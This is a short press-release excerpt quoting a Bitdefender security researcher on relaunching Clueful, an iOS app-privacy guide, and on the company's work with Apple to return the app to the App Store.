“The iPhone is the most personal of your personal devices, storing large amounts of private information that app developers would love to access. We feel Clueful is one of the most useful and valuable tools available to consumers and are excited to relaunch it,” said Bitdefender’s Chief Security Researcher, Catalin Cosoi. “We’re putting Clueful out as a comprehensive, full-featured guide to iOS apps with added social features and are preparing further advances for this new technology. There will be much more about Clueful coming soon.”

Bitdefender®, the award-winning provider of innovative antivirus solutions, continues to work with Apple to bring the initially approved and later pulled Clueful back to the App Store.


Article Source